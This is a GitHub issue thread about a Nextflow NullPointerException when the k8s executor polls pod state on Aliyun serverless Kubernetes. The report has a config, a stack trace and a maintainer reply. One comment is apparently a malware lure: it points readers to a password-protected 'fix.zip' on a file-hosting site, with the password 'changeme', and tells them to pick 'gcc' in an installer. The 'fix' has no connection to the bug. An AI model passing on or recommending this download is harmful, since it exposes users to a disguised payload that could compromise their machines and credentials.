### ISSUE TITLE
aliyun serverless kubernetes schedule failure

### ISSUE THREAD

**Issue by GlobeFishNG** [nextflow-io/nextflow#5263]
### Expected behavior and actual behavior

1, Assign to use serverless k8s as the executor in aliyun ACK.
```
process {
  executor = 'k8s'
  container = '${container}'
  pod = [
    [label: 'alibabacloud.com/eci', value: 'true'],
    [annotation: 'k8s.aliyun.com/imc-perfect-match', value: 'true'],
    [annotation: 'k8s.aliyun.com/eci-image-cache', value: 'true'],
    [annotation: 'k8s.aliyun.com/eci-extra-ephemeral-storage', value: '10Gi'],
  ]
}
```

### Steps to reproduce the problem

Start any workflow.

### Program output 

```
Aug-28 03:20:57.377 [Task monitor] DEBUG nextflow.processor.TaskProcessor - Handling unexpected conditio  task: name=deepprep_init; work-dir=/workplace/output/WorkDir/nextflow/64/c87f82098dbfc3b0178798fd833fa  error [java.lang.NullPointerException]: Cannot invoke "java.util.Map.get(Object)" because "cond" is nuAug-28 03:20:57.397 [Task monitor] ERROR nextflow.processor.TaskProcessor - Error executing process > 'd                                                                                                        Caused by:
  Cannot invoke "java.util.Map.get(Object)" because "cond" is null


java.lang.NullPointerException: Cannot invoke "java.util.Map.get(Object)" because "cond" is null
        at nextflow.k8s.client.K8sClient.podState(K8sClient.groovy:491)
        at nextflow.k8s.K8sTaskHandler.getState(K8sTaskHandler.groovy:343)
        at nextflow.k8s.K8sTaskHandler.checkIfRunning(K8sTaskHandler.groovy:369)
        at nextflow.processor.TaskPollingMonitor.checkTaskStatus(TaskPollingMonitor.groovy:642)
        at nextflow.processor.TaskPollingMonitor.checkAllTasks(TaskPollingMonitor.groovy:571)
        at nextflow.processor.TaskPollingMonitor.pollLoop(TaskPollingMonitor.groovy:441)
        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:        at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorIm        at java.base/java.lang.reflect.Method.invoke(Method.java:569)                                           at org.codehaus.groovy.reflection.CachedMethod.invoke(CachedMethod.java:343)                            at groovy.lang.MetaMethod.doMethodInvoke(MetaMethod.java:328)                                           at groovy.lang.MetaClassImpl.doInvokeMethod(MetaClassImpl.java:1333)                                    at groovy.lang.MetaClassImpl.invokeMethod(MetaClassImpl.java:1088)                                      at groovy.lang.MetaClassImpl.invokeMethod(MetaClassImpl.java:1007)                                      at org.codehaus.groovy.runtime.InvokerHelper.invokePogoMethod(InvokerHelper.java:645)                   at org.codehaus.groovy.runtime.InvokerHelper.invokeMethod(InvokerHelper.java:628)                       at org.codehaus.groovy.runtime.InvokerHelper.invokeMethodSafe(InvokerHelper.java:82)                    at nextflow.processor.TaskPollingMonitor$_start_closure2.doCall(TaskPollingMonitor.groovy:316)          at nextflow.processor.TaskPollingMonitor$_start_closure2.call(TaskPollingMonitor.groovy)                at groovy.lang.Closure.run(Closure.java:505)
```

### Environment 

* Nextflow version: [24.07.0-edge] 
* Java version: [17.0.12]
* Operating system: [Linux]
* Bash version: (use the command `$SHELL --version`) 5.2.26(1)-release

**Comment by cnhbliyou** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by pditommaso** [comment]
Impossible to replicate
